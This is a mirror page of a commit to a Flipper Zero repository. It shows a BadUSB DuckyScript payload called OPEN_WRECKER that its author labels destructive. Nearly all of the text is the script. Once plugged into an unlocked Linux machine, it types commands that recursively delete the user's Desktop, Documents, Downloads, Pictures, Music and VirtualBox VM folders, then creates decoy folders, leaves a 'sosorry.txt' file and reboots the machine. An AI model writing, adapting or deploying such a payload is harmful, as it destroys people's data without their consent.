mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
15a4a79c64
Small update to reboot or shutdown. Ensure open_wrecker did the job
28 lines
630 B
Plaintext
28 lines
630 B
Plaintext
REM Author: FLIZZ3R
|
|
REM TITLE: OPEN_WRECKER
|
|
REM OBJECTIVE: DESTRUCTIVE!CAUTION! wipe open linux machines Directories then create dummy directories and sorry text file**Added Reboot for shutdown :< shutdown -h now>:***
|
|
|
|
DELAY 500
|
|
WINDOWS d
|
|
DELAY 300
|
|
CTRL-ALT t
|
|
+DELAY 1500
|
|
+STRING rm -r Desktop Downloads Pictures #snap Documents Music Public Templates +++'VirtualBox VMs'
|
|
+ENTER
|
|
+DELAY 1500
|
|
STRING mkdir Deskop downloadz Pics Dox ++Music Public TEMPS Vms
|
|
ENTER
|
|
+DELAY 500
|
|
+STRING cd Deskop
|
|
+ENTER
|
|
+DELAY 500
|
|
+STRING touch sosorry.txt
|
|
+ENTER
|
|
+ALT F4
|
|
+DELAY 100
|
|
+CTRL-ALT t
|
|
+DELAY 1000
|
|
+STRING reboot
|
|
+ENTER
|
|
:::FLIZZ3R@DISCORD)))
|